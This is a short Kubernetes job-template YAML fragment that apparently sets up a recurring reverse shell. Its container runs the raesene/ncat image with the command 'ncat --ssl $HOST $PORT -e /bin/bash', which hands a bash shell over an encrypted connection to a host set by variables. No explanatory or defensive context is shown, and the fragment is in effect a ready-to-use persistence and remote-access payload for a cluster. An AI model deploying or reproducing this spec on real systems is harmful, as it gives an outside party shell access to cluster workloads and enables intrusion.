spec:
  jobTemplate:
    spec:
      template:
        spec:
          containers:
          - name: container
            image: raesene/ncat
            command: [ "/bin/sh", "-c", "--" ]
            args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ]
